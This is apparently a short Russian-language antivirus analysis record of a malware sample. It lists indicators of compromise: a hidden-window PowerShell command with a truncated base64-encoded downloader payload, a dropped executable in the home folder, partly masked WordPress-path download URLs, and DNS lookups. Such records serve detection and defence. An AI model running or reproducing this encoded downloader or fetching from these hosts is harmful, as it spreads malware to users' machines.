Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABiAG8AZQB0AHQAbwB1AHkAZgBhAHQAaAA9ACcAdwBpAGUAawByAGkAbwB4AHcAdQBtAHgAaQBvAHIAcgBpAG4AcwBlAG8AYwBoACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBDAH...
- %HOMEPATH%\237.exe
- %HOMEPATH%\237.exe
- http://www.cx##.net/wp-includes/JwryoDD2/
- http://we####e.cxyw.net/admindm-yourname/8QvK/
- http://sp####hecker.net/wp-admin/tG517758/
- http://hd####slist.site/wp-admin/EfxXO94/
- DNS ASK ce#######merald.mockienan.com
- DNS ASK cx##.net
- DNS ASK we####e.cxyw.net
- DNS ASK sp####hecker.net
- DNS ASK hd####slist.site
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABiAG8AZQB0AHQAbwB1AHkAZgBhAHQAaAA9ACcAdwBpAGUAawByAGkAbwB4AHcAdQBtAHgAaQBvAHIAcgBpAG4AcwBlAG8AYwBoACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBDAH...' (со скрытым окном)